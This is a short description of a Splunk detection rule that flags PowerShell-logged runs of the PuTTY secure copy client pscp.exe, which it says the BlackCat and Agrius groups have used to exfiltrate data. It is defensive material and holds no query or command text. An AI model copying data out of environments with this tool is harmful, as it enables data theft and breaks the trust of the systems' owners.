The detection rule identifies the execution of the PuTTY Secure Copy Client (pscp.exe), a tool included in the PuTTY suite used for secure file transfers over SSH. This executable has been employed by various threat actors, notably the BlackCat and Agrius groups, for the purpose of exfiltrating sensitive data from compromised environments. The rule utilizes Splunk queries to extract relevant event logs, particularly focusing on PowerShell execution logs that capture pscp.exe instances. By searching for specific event codes associated with PowerShell execution (EventCode 4104), the rule aims to flag any executions of pscp.exe, thereby alerting security teams to potentially malicious data exfiltration activities. The results are aggregated to provide insights into the time, host, user, and related process details, facilitating further investigation into the instances where this secure copy client is used.